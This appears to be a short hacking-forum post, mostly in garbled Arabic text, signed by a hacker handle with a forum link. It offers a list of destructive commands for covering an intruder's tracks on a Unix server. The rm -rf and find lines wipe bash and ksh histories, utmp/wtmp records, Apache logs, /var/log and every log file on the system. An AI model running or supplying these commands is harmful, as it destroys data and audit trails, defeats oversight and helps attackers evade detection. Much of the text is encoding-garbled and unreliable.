ٟ‫ ت‬ٞ‫ٓ اإل‬٠‫َ ترفى‬ٛ‫م‬٠ ‫هفه‬١ٌٍ‫اٌفائكج ِٓ لاٌه ا‬ٚ ‫ق‬ٌٍٛ‫َ تٍّػ ٍِفاخ ا‬ٛ‫ٔم‬
‫هفه‬١ٌٍ‫ ا‬ٟ‫اشانن ف‬ٚ
‫ظك ٌه أشه تؼك٘ا إْ شاءاهلل‬ٛ٠‫ال‬ٚ ‫ق‬ٌٍٛ‫اِه ٍِػ ٍِفاخ ا‬ٚ‫ا أ‬١٘ ٞ‫٘م‬ٚ
‫ا‬ٍٙ‫ا و‬ٙ‫م‬١‫التك ِٓ ذـث‬
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {}
\;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
 ‫اٌخاحّت‬

‫ال خري يف كامت العلم‬

 Fawa3z DEvIL
Fawazhack@hotmail.com
http://www.js-hack.com/vb